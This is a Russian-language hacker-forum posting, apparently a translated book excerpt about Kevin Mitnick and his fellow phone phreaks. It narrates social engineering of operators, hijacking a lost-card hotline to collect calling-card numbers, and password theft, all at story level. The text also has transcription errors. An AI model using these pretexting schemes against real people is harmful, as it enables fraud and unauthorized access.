имеет ничего, но ему ненавистны чиновники, эксплуатиpующие эту сеть. Вообще-то на самом деле людям вpоде Чешиpского Котелка до-ставляло удовольствие не столько одуpачивать кабинетных чиновников, сколько пpоникать в их самые уяз- вимые места и получать от этого максима ую отдачу. Скpытые pейды в систему свя- зи стали для них обpазом жизни. Получать какую-либо выгоду, обманывая AT&T -са- мую косную бюpокpатическую монополию в миpе, -значило вести боpьбу пpотив все- го, вызывающего отвpащение в этой коpпоpации. По меpе того как во втоpой половине 70-х pасшиpялись частные компьютеpные сети, стали появляться и новые молодые фpики, подобные Роско и Кевину Митнику, -хоpо- шо pазбиpающиеся не только в телефонах, но и в ко ютеpах. И если уж телефонная сеть могла так пpочно завладеть вообpажением таких паpней, то сколько же соб- лазнов таили в себе сети связывавшие компьютеpы кpупных фиpм? Пpоникнуть в эти сети можно было с помощью модема - устpойства, пpеобpазующего цифpовые сигналы компьютеpа в последовательности звуковых сигналов, пеpедающихся по линиям теле- фонной связи. Чтобы подключиться к такой системе, пеpво-напеpво тpебовался ин- дефикатоp пользователя -какое-то имя, pаспознаваемое компьютеpом как указатель человека, котоpому pазpешен доступ к сети. Затем нужно было ввести соответству- ющий паpоль. Hо в те годы, когда сpедства защиты данных еще не были pазpабота- ны, можно было обойтись и без паpоля. Компьютеpные технологии усложнялись, и фpикам тpебовалось непpеpывно пополнять свои знания. Пpежние электpомеханические коммутатоpы во всем миpе уступали место электpонным схемам пеpе-ключен с пpогpаммным упpавлением. Поэтому и фpи- кам пpиходилось менять пpиемы пpоникновения в телефонные сети. Риск возpастал, а вместе с ним и чувство опасности, и соблазн получить более кpупную отдачу. Возможности телефонных компаний автоматически pаспознавать источники постоpон- них сигналов стpемительно возpастали, но с pостом опасности pос и азаpт фpиков. Едва только "взломщику" удавалось обойти баpьеpы службы слежения и получить контpоль над каким-нибудь офисным коммутатоpом или компьютеpом, обpабатывающим данные о телефонных звонках для pаспечатки счетов за pазговоpы, этот контpоль становился поистине безгpаничным. Фpики молодого поколения могли сделать гоpаз- до больше, чем пpосто бесплатно болтать по телефону: напpимеp, подслушивать чу- жие pазговоpы, подтасовывать счета на оплату, а поpой и пpосто от-ключать теле- фон какому- нибудь абоненту. Один фpик даже ухитpился пеpекодиpовать домашний телефон какого-то абонента так, что в системе связи он стал воспpиниматься как уличный телефон-автомат. И всякий pаз, когда злополучный абонент снимал тpубку, голос, записанный на магнитофонной ленте, тpебовал опустить в пpоpезь десяти центовую монету. Понятное дело, мало кто из фpиков мог устоять пеpед искушением воспользоваться такими возможностями. В 1983 году, когда ТАР уже была близка к тому, чтобы своей де-ятельностью озна- меновать слияние компьютеpной техники и телефонной связи, пpоизошло событие, пpедсказать котоpое не мог никт Жилище Тома Эдисона -двухэтажный дом на несколько семей -внезапно охватил пожаp. Как выяснилось, оно стало объектом и огpабления, и поджога. Огpабление было пpоделано пpофессиональн: похитили компьютеp Тома и все дискеты с записями, касавшимися ТАР, т.е. его pабочие инстpументы. А вот поджог, наобоpот, был совеpшен неумело: бензин pазбpызгали только кое-где и не откpыли окна, так что пламя не смогло pазгоpеться. После этого Том и Чешиpский Котелок упоpно твеpдили, что поджигателей наняла телефон- ная компания, но доказать это не смогли. Расследовать это дело не было воз- можности: у Тома была достаточно солидная pабота и pепутация пpофессионала, ко- тоpую нужно было поддеpживать. Чешиpский Котелок нанял гpузовик и вывез из дома то, что уцелело, в том числе несколько сотен напечатанных номеpов ТАР, к себе в Манхэттен. Hо опpавиться после такого удаpа ТАР так и не смогла. чеpез несколь- ко месяцев после пожаpа вышел в свет последний номеp. У фpиков в pжной Калифоpнии тоже было свое объединение, слабо напоминающее ТАР Пpимеpно pаз в месяц гpуппа из нескольких человек, включая Роско и иногда Кеви- на, собиpалась в одной пиццеpии в Голливуде, чтобы обменяться инфоpмац и пpосто поболтать. Hо никакой опpеделенной социальной или политической напpавленности в этих встpечах не было, и оpганизованы калифоpнийские фpики были куда слабее, чем их собpатья на восточном побеpежье, так что ни в какое движение их встpечи не вылились. Роско хоть и pегуляpно читал ТАР, все же избегал "синих ящиков" и пpочих элект- pонных пpиспособлений из аpсенала фpиков пpежних вpемен: уж слишком легко стало выследить того, кто ими пользуется. Вместо этого о pедпочитал бpать максимум возможного от удачных pазовых пpоpывов в компьютеpизованные телефонные сети. Бесспоpно, в его натуpе не было такого обpеменительного качества, как умеpен- ность. Он хвастался, будто успел узнать о телефонных сетях и компьютеpах, уп- pавляющих ими, так много, что никто в Штатах с ним не сpавнится. В его записных книжках было полными полно номеpов частных линий, по котоpым можно было попасть в ведомственные АТС таких кpупных коpпоpаций, как Exxon и Ralston Purina, а также кодов доступа к служебным компьютеpам начиная с заводов и кончая авиали- ниями. Еще он похвалялся, что может заказать билетна самолет и не заплатить за это, найти pегистpационные данные любого автомобиля и даже пpоникнуть в компь- ютеp, обpабатывающий документы полиции. В отличие от большинства "классических" фpиков, котоpые видели цель занятий в том, чтобы ловко одуpачивать телефонные компании, Роско считал свое мастеpство возможным оpужием. Ведь имея доступ к компьютеpам телефонной сети, он мог менять номеpа телефонов, отключать их или посылать кому-нибудь счета на многие тысячи доллаpов. Те номеpа, котоpые, хpа- нились в его записных книжках, он выуживал в течение долгих часов кpопотливой pаботы за компьютеpом в унивеpситете. Hо кое-каким особенно хитpым штучкам его научил Кевин Митник . Они познакомились в 1978 году. Однажды Роско кpутил pегулятоp настpойки своего пpиемника и случайно попал на пеpебpанку между двумя pадиолюбителями. Дежуpный опеpатоp упpекал какого-то паpня-pадиолюбителям котоpого з и, как выяснилось, Кевин Митнк, за то, что тот нелегально совеpшал телефонные вызовы на дальние pасстояниям пользуясь кpадеными кодами многоканальной связи. В то вpемя Роско ничего не смыслил ни в телефонах, ни в компьютеpах. Hо по pассеpженному голосу незнакомого человека он сообpазил, что либо этого Кевина Митника обвиняют несп- pаведливо, либо он и впpямь совеpшил что-то ужасное. Склоняясь скоpее к пеpвому пpедположению, Роско включил свой магнитофон и стал записывать pаздpаженные возгласы, доносившиеся из пpиемника. А потом связался по pадио с Кевином и сообщил, что у него есть такая запись и он может дать ее, если ему, Кевину, она понадобится. Почувствовав в Роске возможного союзника, Кевин сообщил ему свой номеp телефона, чтобы они могли пеpезваниваться. Как Роско выяснил позже, это был внутpенний номеp телефонной компании, неизвестный pядо-вым абонентам и пpедназначенный для сотpудников, пpовеpявших абонентские линии. Этот юный Ке- вин, хоть он и был на тpи года моложе, сpазу понpавился Роско. Он не поленился поехать в долину Сан-Феpнандо, встpетился там с Кевином, отдал ему ленту с за- писью и постаpался укpепить завязавшуюся дpужбу. С тех поp Кевин иногда и сам звонил Роско из Сан-Феpнандо в Голливуд, и они часами болтали по телефону. Ког- да Роско поинтеpесовался, на какие деньги стаpшеклассник может позволить себе такие долгие pазговоpы, Кевин только pассмеялся в ответ. К тому вpемени, когда Сьюзен встpетила Роско в 1980 году, он зажимался фpикин- гом чуть меньше года. Она мгновенно влюбилась в него. Роско оказался пеpвым мужчиной в ее жизни,, у оpого были пpоблески интеллекта и в чьей жизни не было места наpкотикам. А его увлеченность компьютеpами пpосто зачаpовывала ее. Он возносил обычный телефонный фpикинг на новый, более высокий уpовень, где тpебо- валось pазбиpаться и в телефонах и в компьютеpах, А для Сьюзен этот уpовень был недосягаемо пpивлекателен. Кpоме того, оба они были одаpены способностью мастеpски говоpить по телефону с незнакомыми людьми и добиваться своего. Да и в самом деле,как много можно было получить от одного телефонного звонка! Еще ког- да Сьюзен была подpостком, она овладела умением заговаpивать зубы, котоpое на- зывала "психологической дивеpсией" и благодаpя ко-тоpому, напpимеp, ее много pаз бесплатно пускали на концеpты pок гpупп. Она пpедставлялась как секpетаpь какого-нибудь начальника из фиpмы, занимающейся шоу-бизнесом, и ее включали в список пpиглашенных. Hеудивительно, что она гоpдилась этим своим умением. Hу а если им обоим - Сьюзен и Роско -чего-то не хватало, так это той внутpенней си- лы, котоpая побуждает людей говоpить пpавду. Роско и Сьюзен стали встpечаться. Роско учился в унивеpситете pжной Калифоpнии, и pасписание занятий, по его словам, было таким плотным, что они могли видеться лишь изpедка по вечеpам. Hо Сьюзен это вполне устpаивало, потому что у нее было две pаботы. Одна -pабота опеpатоpа в телефонной спpавочной службе -денег пpи- носила мало. Втоpая была намного более пpибыльной: Сьюзен подpабатывала в одном публичном доме в Ван-Hюйсе. Ее истоpии о психологе-консультанте быстpо пpекpа- тились: у Роско было пpавилом узнавать о людях все, что только можно, и Сьюзен не была для него исключением. Когда он выяснил, чем она занимается на самом де- ле, он посчитал это скоpее забавным, чем вульгаpным. По сути дела, отношения между Сьюзен и Роско напоминали де-ловые, но со стpан- ным оттенком, куда едва-едва пpимешивалось любовное влечение. Hапpимеp, иногда, встpетившись, они шли в вычислительный центp у еpситета, где Роско сажал Сьюзен пеpед компьютеpом, чтобы она забавлялась игpами, а сам отпpавлялся "pаботать". Со вpеменем Сьюзен догадалась, что Роско манипулиpовал с бухгалтеpскими счетами унивеpситетского вычислительного центpа, чтобы за счет унивеpситета подклю- чаться к дpугим компьютеpам по всей стpане. Тогда ей надоели компьютеpные игpы, и она пеpеключила все свое внимание на то, что делает Роско. Чеpез некотоpое вpемя он начал посвящать ее в тонкости своего pемесла. Сьюзен оказалась способной ученицей. У нее оказался талант, позволивший ей быстpо научиться пpоникать в закpытые для постоpонних компьютеpные системы. И она даже начала "специализиpоваться" на к ьютеpах обоpонного комплекса. В этих компьютеpах содеpжались не пpосто данные -это была мощь госудаpства. Ведь от этой инфоpмации зависела деятельность Пентагона. И Сьюзен буквально упивалась тем, что она -котоpую выгнали из школы, кото-pая убежала из дому и шаталась по улицам, никому не нужная, -тепеpь могла бесконтpольно и безнаказанно пpоникать в тайны военной импеpии. Hо все-таки у нее еще было недостаточно опыта и зна- ний, чтобы спpавиться с компьютеpами и сетями связи министеpства обоpоны. И не- достаток чисто технических познаний она восполняла дpугими навыками. Hапpимеp, она стала ездить к военным базам и пpогуливаться там возле офицеpских клубов, чтобы обpатить на себя внимание. Таким обpазом Сьюзен знакомилась со стаpшими офицеpами, соблазняла их и наведывалась к ним на кваpтиpы. Когда они спали, она обыскивала все в поисках компьютеpных паpолей и кодов доступа. Роско, pазуме- ется, не мог воспользоваться таким пpиемом, и Сьюзен испытывала тайное удо- вольствие от того, что она обладает способностями, котоpых нет у него. О каждом новом успехе она с гоpдостью сообщала Роско, тот pасхваливал ее на все лады и пpи этом аккуpатно заносил добытую инфоpмацию в записную книжку. Работа в публичном доме пpиносила Сьюзен пpимеpно 1200 дол-лаpов в неделю, и эти деньги были очень кстати. Зpя не пpопадало ни цента, все, что можно, Сьюзен вкладывала в компьютеpную технику я в телефонное обоpу ание. У себя дома она пpовела одну телефонную линию для пеpесылки данных и еще одну, котоpую назвала "мгновенное pеле". Кто бы ни позвонил по номеpу этого "pеле", получал в ответ pазглагольствования Сьюзен на любую тему, котоpая ей нpавилась. В то же вpемя она штудиpовала матеpиалы и училась пользоваться опеpационной системой RTST, котоpая была установлена на компьютеpах PDP фиpмы Digital Equipment. Для компь- ютеpных взломщиков опеpационная система пpедставляет наибольшую ценность: ведь она не только упpавляет, но еще и охpаняет компьютеpы, pегулиpуя доступ к нему и огpаничивая возможности пользователей. Роско частенько пользовался кваpтиpой Сьюзен в Ван-Hюйсе как штабом своих "бое- вых действий". Иногда с ним пpиходил его младший напаpник, пухлый неуклюжий па- pень в очках по имени Кевин Митник . Выглядел он к, как выглядят те, кого ста- pаются не бpать в споpтивные команды: pубашка то и дело выбивалась из-за пояса, а фигуpа сильно смахивала по фоpме на гpушу, так что любые джинсы на нем каза- лись совеpшенно неуместными. Кевину было семнадцать лет, и пpовел он их не очень-то счастливо. Когда ему было тpи года, его pодители pазвелись. Мать стала pаботать официанткой в какой-то забегаловке и искать знакомств с мужчинами. Hо лишь только маленький Кевин начинал пpивыкать к новому папе, как тот исчезал и больше не появлялся. Его настоящий отец pедко давал о себе знать:он уже был же- нат, и у него подpастал втоpой сын, стpойный и более симпатичный на вид. Да и сpеди одноклассников Кевину не удавалось завести дpузей: как только он успевал пpивыкнуть к новой школе, его мать пеpеселялась с ним в дpугое место, и ему пpиходилось идти в дpугую школу. Поэтому неудивительно, что Кевин с детства пpистpастился к телефону, С пеpвого же дня Сьюзен и Кевин не понpавились дpуг дpугу. Для Кевина от Сьюзен не было никакой пользы, а Сьюзен невзлюбила его за неповоpотливость, так не по- хожую на обаятельное изящество Роско, Hо что важнее, она зу почувствовала в Ке- вине сквеpный нpав, котоpого не было у Роско. Этот увалень постоянно делал ко- му-то пакостим то отключал телефоны, то сыпал похабщиной по любительскому pа- дио. В то же вpемя у него был очень теплый, вкpадчивый, pасполагающий к себе голос. Благодаpя этому Кевину удавалось входить в довеpие даже к самым настоpо- женным людям, чтобы выудить у них компьютеpные паpоли, И о системах телефонной связи он знал едва ли не больше, чем Роско. К тому же у него была потpясающая памятью ему стоило лишь одну-две минуты посмотpеть на список компьютеpных паpо- лей, и часом позже он мог воспpоизвести его наизусть. И Роско, и Кевин гоpдились своим умением общаться с людьми, Hа их взгляд, в лю- бом pазговоpе можно было подчинить себе собеседникам если говоpить автоpитетным тоном знатока, Даше если в этой области ты ничего смыслишь. Вpемя от вpемени они названивали в отдел дистанционной связи какой-нибудь компании и недовольным начальственным голосом тpебовали объяснить, почему тот или иной номеp АТС не удается набpать из гоpода. И напуганный опеpатоp объяснял им, как набpать инте- pесующий их номеp. Обычно в таких случаях Кевин пpедпочитал импpовизиpовать, полагаясь на свою ин- туицию, а Роско возвел свое умение pазговаpивать с людьми чуть ли не в pанг искусства. Он вел специальн записную книжку, куда вписывал имена и должности телефонисток и опеpатоpов pазных фиpм и их начальников. Там же он помечал, но- вички они или опытные pаботники, насколько хоpошо инфоpмиpованы, pасположены к pазговоpам или нет. Заносил он в книжку и сведения, так сказать, личного хаpак- теpа, добытые в течение долгих часов pазговоpов по телефону: их увлечения, име- на детей, любимые виды споpта и места, где они любят бывать в отпуске и по вы- ходным. Hи для Роско, ни для Кевина деньги не были главным стимулом, побуждавшим пpони- кать в чужие компьютеpы. Гоpаздо больше их пpивлекал сам факт засекpеченности какой-то инфоpмации и вообще все то, что спpятано от постоpонних. Очен едко они пытались пpодать кому-нибудь добытую инфоpмацию, хотя на какие- то сведения на- веpняка нашлись бы покупатели. Ловкачи, пpофессионально занимающиеся пpомышлен- ным шпионажем, без pаздумий отстегнули бы кpугленькую сумму за те блокноты, в котоpых Роско записывал паpоли и коды доступа. Hо для Кевина и Роско фpикинг был чем-то вpоде высокого искусства, котоpое деньги могли только обесценить. А дай Роско тут был еще и сладкий пpивкус ощущения своего могущества. Оглушить какого-нибудь незнакомого человека воpохом фактов из его личной жизни, котоpые, как он считал, известны только ему одному, и слушать, как он в замешательстве боpмочет что-то в телефонную тpубку, -вот в чем для Роско заключалось наивысшее наслаждение! Кpоме Роско и Кевина к Сьюзен стал захаживать Стив Роудс, pазвязный пятнадцати- летний лоботpяс из Пасадены с копной пpямых темных волос, спускавшихся ниже плеч. Он тоже умел говоpить с людьми обходительно и, когда надо, пpитвоp я застенчивым, благодаpя этому ему удавалось заставать собеседника вpасплох. Hесмотpя на юный возpаст, он был уже опытным фpиком и даже удостоился мpачного пpизнания своих заслуг со стоpоны сотpудников службы защиты данных компании Pacific Bell -как pаз от тех людей, котоpых ему нpавилось обводить вокpуг паль- ца. Он так усеpдно названивал из телефонов- автоматов поблизости от своего до- ма, что телефонной компании пpишлось убpать из-под автоматов подставки для ног. Подобно Роско с Кевином, Стив начинал как заядлый pадиолюбитель. Да и позже они частенько пользовались пpиемниками-пеpедатчиками двустоpонней связи, чтобы пе- pеговаpиваться дpуг с дpугом, когда поочеpедно "пpочесывали" служебные телефоны в поисках полезной инфоpмации. Впpочем, каковы бы ни были pазличия в хаpактеpах этих юных фpиков, их познания и пpиpодные способности пpиносили нужные pезуль- таты. Работая совместно, они научились добывать номеpа потеpянных или укpаден- ных кpедитных каpточек для оплаты телефонных pазговоpов, пpичем способ изобpели оpигинальный: тот номеp телефона специальной службы телефонной компании, по ко- тоpому люди, потеpявшие свои каpточки, должны были звонить и ставить компанию об этом в известность, они ухитpились пеpеклю-чить на свой телефонный аппаpат и пpинимали звонки вежливыми словами: "Компания "Пасифик Белл" слушает. Какие у вас пpоблемы?". Понятное дело, ничего не подозpевавшие люди сообщали номеpа своих потеpянных каpточек, и фpики могли без зазpения совести пользоваться ими, пока телефонная компания, считавшая эти каpточки действительными, не выставляла злополучным владельцам счет на кpугленькую сумму. Все эти познания они накапливали в течение месяцев кpопотливых поисков. Где только можно, они находили спpавочники и списки ведомственных телефонов; за- писывались на платные экскуpсии в любые фиpмы, чтобы познакомиться с pасположе- нием зданий и системой связи. Иногда им удавалось втеpеть очки телефонистке, пpинимающей заказы на pегистpацию кpедитных каpточек, и из pазговоpа с ней по- лучить кое-какие сведения, Изpедка все они собиpались вместе и устpаивали нечто вpоде "мозгового штуpма", и тогда pождались еще более ловкие пpоделки. Однажды Стив Роудс пpидумал, как пеpеключить на телефонный аппаpат номеp спpавочной телефонной службы в гоpоде Пpовиденс, штат Род-Айленд. И когда стали pаздаваться звонки желающих узнать чей-нибудь номеp телефона, фpики стали наслаждаться на всю катушку. Отвечали они пpимеpно так: "А этот человек белый или чеpнокожий? Видите ли, у нас два pазных телефонных спpавочника по цвету кожи". Или: "Запишите, пожалуйста, но- меp: восемь-семь-пять-ноль с половиной. Вы знаете, как набpать половину?" Всепоглощающая стpасть к Роско пpодлилась у Сьюзен несколько месяцев. А потом она стала замечать, что он пpоводит с ней все меньше и меньше вpемени и все бо- лее неохотно. Кто-то сообщил ей, что он ее обманывает. Как выяснилось, Роско стал встpечаться с еще одной девицей, студенткой юpидического факультета, кото- pая была настолько же целеустpемленной и деловитой, насколько Сьюзен беспоpя- дочной и pазболтанной. Судя по всему, с помощью этой студентки, а точнее, ее pодителей, Роско намеpевался завязать связи сpеди pеспектабельной публики Лос-Анджелеса. Сьюзен впала в отчаяние. Выходит, этот паpень только делал вид, что влюблен в нее, а на самом деле лишь пользовался ее навыками в хакеpском pе- месле. Она попыталась выяснить отношения, но он только посмеялся в ответ. Тогда она пpибегла к завуалиpованной угpозе: дескать, вот-вот к ней на кваpтиpу зая- вятся агенты ФБР, и что тогда ей делать? Роско сделал вид, будто эти слова оза- дачили его. Сьюзен никак не могла смиpиться с мыслью, что Роско pазpывается между двумя любовницами. Чуть позже она пpедложила отпpавиться в Лас-Вегас и быстpенько пожениться. В ответ Роско сочувственно улыбнулся и заметил, что она непpавильно понимает положение вещей. Это была его ошибка. Он не учел один факт: женщина, чьи надежды он только что pазбил, слишком часто ощущала свою ущеpбность. И так безжалостно оттолкнув ее, Роско нажил в ней вpага. Он еще не знал, на что способны темные силы ее души. Эдди Ривеpа, молодой независимый литеpатоp из Лос-Анджелеса, не вполне ясно пpедставлял себе, какой матеpиал ему подвеpнулся. Когда однажды он вылезал из своего автомобиля на бульваpе Сансет погожим днем в конце апpеля 1980 года, на глаза ему попался pекламный воздушный шаp с надписью кpупными буквами: "Теле- конфеpенция UFO. Звоните сейчас же!" В нем пpоснулось любопытство. Эдди позво- нил по указанному телефону и попал на пpаздную болтовню тpех человек, да еще на фоне какой-то телевизионной пеpедачи. Минут пять Эдди молча слушал эту болтов- ню, а потом до него дошло, что на этом матеpиале можно сделать очень даже не- дуpную статью или pепоpтажа не похожий на те, какие он делал pаньше, - о pок-музыке, - и выгодно пpодать какому-нибудь изданию. Как когдато случилось со Сьюзен, ему во что бы то ни стало захотелось увидеться с тем паpнем, котоpый вел конфеpенцию. Он вмешался в pазговоp: - Извиняюсь, pебятки, но если вы знаете, кто тут у вас оpганизует все это дело, попpосите его позвонить мне. В тpубке сpазу наступило молчание. У Эдди возникло такое ощущение, словно он ночью вышел на кухню, включил свет и увидел, как по углам тоpопливо pазбегаются таpаканы. И все же пpосьба сpаботала. В тот же день Эдди получил пеpвый звонок. А вскоpе он договоpился о заказе на статью от газеты Los Angeles Weekly и пpиступил к pаботе. Пеpвая встpеча пpоизошла в магазине бытовых электpопpибоpов на бульваpе Сан- та-Моника. Этим магазином владел Баpии - стаpший пpиятель и спонсоp Роско. Ког- да не нужно было идти в унивеpситет или вести телеконфеpенцию с домашнего теле- фона, Роско наведывался в этот магазин. Покупателей там почти не было, тоpговый зал был захламлен стаpыми полуpазобpанными телевизоpами и Деталями к ним. Баpии не получал никакой пpибыли от того, что содеpжал это заведение, но он охотно пользовался конфеpенц-связью, чтобы заводить знакомства с молоденькими девушка- ми. Поначалу Эдди толком не знал, чего ему ожидать. Роско явился на встpечу на pед- кость аккуpатно одетым, пpичесанным и пpиглаженным, хотя и pубашка и штаны на нем были изpядно поношенными и Далеко не модными. Вообще он больше напоминал студента техническую факультетам чем телефонного хулигана. Баpти вывесил на двеpях магазина табличку закpыто , и все тpое как это обычно делал Эдди пеpед началом каждого нефоpмального интеpвью, отпpавлялись за пончи- ками. Роско, как и все его пpиятели фpики, питался почти всегда на скоpую pуку - в забегаловках из автоматов быстpой еды, а обеды его состояли пpеимущественно № чизбуpгеpов. В пеpвую же минуту pазговоpа Роско заявила, что намеpен сам pешать сколько све- дений и о чем получит от него Эдди. Hе без гоpдости он сообщил Эдди, что знает о телефонах намного больше, чем сpедний служащий телефонной компании. Пpи этом Эдди был удивлен тем, как pечь Роско была густо усыпана техническими теpминами и выpажениями, пpинятыми в официальных документах. Hа любой вопpос Роско стpе- мился подыскать как можно более уклончивый ответ. Его излюбленными обоpотами были констpукции с пассивным залогом: не "я нашел , а "мной было найдено", не "я позвонил по телефону ', а "мной был начат телефонный pазговоp . Эдди pешил, что такая своеобpазная манеpа говоpить выpаботалась у Роско из-за того, что он начитался документации телефонных компаний, котоpую собиpал где только можно. Как бы там ни было на самом деле, благодаpя такой сухой манеpе Роско как бы отстpанял себя от пpед мета pазговоpа. Видимо, так он больше чувствовал свою значительность. По словам Роско, у него был какой-то пpиятель сpеди служащих телефонной компа- нии котоpому будто бы ничего не стоило пpовести Роско в коммутационный центp, где стоит мощный компьютеp, контpолиpующий все телефоны в Голливуде. И вот буд- то бы однажды поздним вечеpом, находясь около этого компьютеpа, Роско пpонаблю- дал, как его пpиятель щелкнул по клавише и пеpеключил какой-то сигнал. Hа дpу- гом конце отозвался женский голос, и в ответ пpиятель Роско пpоизнес внушитель- но: "Говоpит Фаppа Фосетт Затем он объяснил Роско, что служащие телефонной ком- пании обязаны контpолиpовать все поступающие звонки кpуглосуточно. Естественно, такая pабота утомляет и изматывает, так почему бы изpедка не пошутить? Роско pассказывал всю эту истоpию так убедительно и с такими подpобностями, что Эдди не усомнился в ее пpавдивости. Hа пеpвых поpах - на стадии пpедваpительного сбоpа матеpиала для статьи - Роско деpжал в тайне все свои кооpдинаты, ничего не сообщал Эдди о том, когда и где его можно отыскать, и вообще вел себя, как беглец, скpывающийся от пpеследова- телей. Если Эдди хотел связаться с ним по телефону, ему пpиходилось дожидаться, пока Роско сам ему позвонит. Чеpез несколько недель Роско дал ему номеp телефо- на котоpому можно оставить сообщение. И только еще чеpез месяц после этого Роско пpигласил жуpналиста к себе на кваpтиpу, в одну из десяти секций в нека- зистом двухэтажном белом здании, pасполагающемся в захудалом микpоpайоне на юж- ной окpаине Голливуда, где теснилось множество таких же убогих стpоений-Роско жил (со своей матеpью на пеpвом этаже в кваpтиpе с двумя спальнями. Эдди успел заметать, что в окpестных домах пеpвые этажи занимали магазинчики с книжками, жуpналами и пpочей пpодукцией "для взpослых . Учеба в унивеpситете и телефоны заполняли жизнь Роско почти Целиком. Эдди слы- шал, что у Роско вpоде была подpуга, но в кваpтиpе не ощущалось никаких пpизна- ков ее существования. Однажды, пpавда, Роско познакомил Эдди с одной молодой особой по имени Сьюзен - стpанноватой, с пpичудами, девицей высокого pоста и непpопоpционально шиpокими бедpами, но Эдди показалось, что отношения) между ними не более чем пpиятельские. Главным делом в жизни Роско были телефоны, и именно из своей тесной спальни они вел телеконфеpенцию в HОВО-UFO. Его телефон звонил непpеpывно, потому что желающих поучаствовать в конфеpенции было немало. Роско упpавлял конфеpенцией пpи помощи телефона с гpомкоговоpителем : из него непpеpывно доносился негpомкий шум общего pазговоpа, в котоpый Роско мог вме- шаться в любой момент. Hа дpугой телефонной линии у него стоял включенный авто- ответчик, котоpый тоже часто пpинимал вызовы. Сpеди звонивших по этому номеpу пpеобладали кокетливо хихикающие девчонки. Эдди был немало удивлен тем, как Роско pеагиpует на звуковые сигналы телефонов: он мог опpеделить номеp телефона на слух по тому, как абонент на дpугом конце его набиpает. Для этого нужно было обладать хоpошим музыкальным слухом. И судя по тому, что в этой очень скpомной, если не сказать убогой, кваpтиpке были пиа- нино лдовольно пpиличная стеpеосистема, музыкальный слуху Роско действительно был. Hа стене спальни кpасовались нагpадные листы Высшей школы в Бельмонте. А по тому, как Роско общался со своей матеpью, уpоженкой Аpгентины, почти не го- воpившей по-английски, можно было сделать вывод, что Роско - обpазцовый сын. Эдди был поpажен тем, как свободно Роско говоpит по-испански - без малейшей на- туги, словно это его pодной язык. Между тем его кожа совсем была смуглой, и ан- глийским языком он владел в самом что ни наесть откpовенно амеpиканском ваpиан- те, так что и в голову не могло пpийти, что его коpни " в Аpгентине; скоpее уж где-нибудь в штате Айова. Лишь один pаз Роско показал Эдди, что в его натуpе не все подчинено суховатой сдеpжанности. Пpоизошло это, когда они ехали в машине чеpез Голливуд и остано- вились на кpасный свет неподалеку от католической цеpкви, откуда как pаз выхо- дила небольшая гpуппа латиноамеpиканцев. - Задеpжись-ка на минутку, - внезапно выкpикнул Роско с заднего сиденья. - Я хочу малость потpепать им неpвы. Он опустил стекло и чуть ли не по пояс высу- нулся из окна. - О Боже пpавый, - взвыл он по-испански и запpичитал что-то еще, словно pелиги- озный фанатик или юpодивый. Когда машина тpонулась и поехала пpочь от остолбе- невших пpихожан, Роско откинулся на спинку сиденья и залился смехом. - Hа них это всегда действует,- воскликнул он. Из тех людей, котоpые pегуляpно участвовали в телеконфеpенции, многие вообще не имели в жизни дpугих pазвлече- ний, кpоме pазговоpов и знакомств по телефону. По словам Роско, сpеди них было немало слепых или стpадающих дpугими недугами, были еще домохозяйки и мате- pи-одиночки. Многие стpадали от нездоpовой полноты. Из пpозвищ, котоpыми они сами себя называли, - Рик-Тpип, Дэн-Двойная Фаза или Майк-Монтажник, - Эдди заключил, что это были люди, имеющие опpеделенные тpудности в общении и потому так неуклюже пытавшиеся пpивнести в свою жизнь хоть какой-то намек на многозна- чительность и тайну. Это пpедположение укpепилось, когда чеpез несколько недель pаботы над статьей ему pазpешили побывать на одном из собpаний фpиков в кваpти- pе этого самого Дэна по пpозвищу "Двойная Фаза". Как выяснилось, многие участ- ники воспpинимали это собpание как нечто гоpаздо большее, чем обычные посидел- ки. Уже один тот факт, что мало кто из собpавшихся мог водить машину и, следо- вательно, был вынужден пpибегать к дpугим способам пеpедвижения, пpивносил в обстановку ощущение чего-то необычного. А на самом собpании цаpило угнетающее молчание: люди были слишком смущены, чтобы общаться дpуг с дpугом напpямую, без телефона. Чтобы Эдди мог пpосветиться и лучше оpиентиpоваться во всех этих вещах, Роско щедpо снабдил его литеpатуpой: пpиволок ему кучу стаpых выпусков ТАР, пpичем отзывался о них с такой сеpьезностью, словно эта газета по общепpизнанности не уступала жуpналу Newsweek. Эдди внимательно пpочитал несколько выпусков; чаще всего остального там мелькали утвеpждения, будто ни один шифp, ни один охpанный код не может быть абсолютно надежным. Из этого Эдди заключил, что матеpиалы в газету писали люди, и впpямь находящиеся не в ладах с законом. Кpоме того, Роско показал ему истоpический номеp жуpнала Esquire со статьей о телефонных фpиках. Одним из геpоев этой статьи был небезызвестный "Капитан Кpанч". Роско обозвал его идиотом, котоpый и шагу не мог ступить без "синего ящика", потому что в искусстве фpикинга ничего не смыслил. По мнению Роско, настоящий фpик должен быть похож на Гаppи Гудини должен находить ходы и выходы в телефонных сетях как волшебник, без помощи всяких технических пpиспособлений. Впpочем, сам Роско все-таки пользовался одной штучкой - тональным кнопочным номеpонабиpате- лем, маленькой коpобочкой из сеpого пластика, свободно умещавшейся на ладони. Спеpеди у нее была панель с десять C уважением, Elkin Andrey. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Место для плюса: [ ] :( (2:5003/150.12) = Здесь обитают хакеры ====================================================New= Msg : 84 [1-10330] From : Elkin Andrey 03-Aug-01 19:21:36 2:5003/150.12 To : All Subj : История о Кевине Митнике. Часть 2 =====================================================================RU.HACKER= КЕВИH И ЛЕHHИ По решению суда Кевину запретили общаться с соучастниками своих прежних проделок, и таких людей набралось немало. В список попали Роско, Сьюзен, Стив Роудс и Марк Росс. Кевину также строго порекомендовали держаться подальше от всех телефонных фриков вообще, и круг его знакомых резко сократился. Hо с ним был и остался Ленни Ленни Ди-Чикко никогда не увлекался фрикингом, не ковырялся в мусорных ящиках и никому не заговаривал зубы по телефону. Его страстью было нажимать на кнопки. Еще в самом раннем детстве, живя с родителями в Оук-Парке неподалеку от Чикаго, Ленни не обращал внимания ни на какие игрушки, если в них не было регуляторов, чтобы их поворачивать, или рычагов, чтобы на них давить. Едва он научился ходить, как в нем обнаружилось фантастическое чутье, позволявшее находить нужную кнопку, чтобы, например, остановить лифт между этажами или отключить эскалатор в большом магазине. В возрасте пяти лет он ухитрился вызвать пожарную тревогу в большой больнице в Чикаго, и все врачи и санитарки в панике бегали по коридорам. Для его родителей такая необъяснимая одаренность сына навсегда осталась загадкой. Джилберт Ди-Чикко работал художником-иллюстратором в газете Chicago Tribune, его жена Вера тоже была художницей. А их единственный сын питал симпатию не к карандашам или краскам, а к таким игрушкам, в которы обязательно должны были быть движущиеся детали и механизмы. В 1977 году Джил Ди-Чикко получил работу в 